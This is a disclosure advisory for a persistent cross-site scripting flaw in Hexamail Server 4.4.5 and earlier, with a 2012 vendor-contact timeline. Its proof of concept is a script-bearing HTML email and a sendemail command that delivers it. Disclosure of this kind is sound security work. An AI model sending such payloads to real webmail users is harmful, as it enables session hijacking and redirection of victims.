Hexamail Server version 4.4.5 or below is vulnerable to a persistent cross-site scripting (XSS) via HTML email.
Hexamail Server suffers persistent XSS vulnerability in the mail body, allowing malicious user to execute scripts in a victim’s browser to hijack user sessions, redirect users, and or the user’s browser.
Proof of concept
By sending a malicious script to thee victim’s email, the webmail automatically load the mail body, so the script will be automatically executed without user permission.
[email protected]:~/# cat > meal.txt <html> <body> <h1>XSS pop up</h1> <script>alert('Hi, what is this?');</script> </body> </html> [email protected]:~/#[/code] Send email to the victim: [code lang="bash" light="true"][email protected]:~/# sendemail -f [email protected] -t [email protected] -xu [email protected] -xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com
04/20/2012 – Issue discovered
04/20/2012 – Vendor contacted
04/27/2012 – Vendor respond and provides new upgrade version
04/30/2012 – Issue still affected on the latest upgrade version
04/30/2012 – Vendor said they still fixing the problem
05/10/2012 – Email sent to ask about the fix progress
06/02/2012 – No response. Sent to Secunia.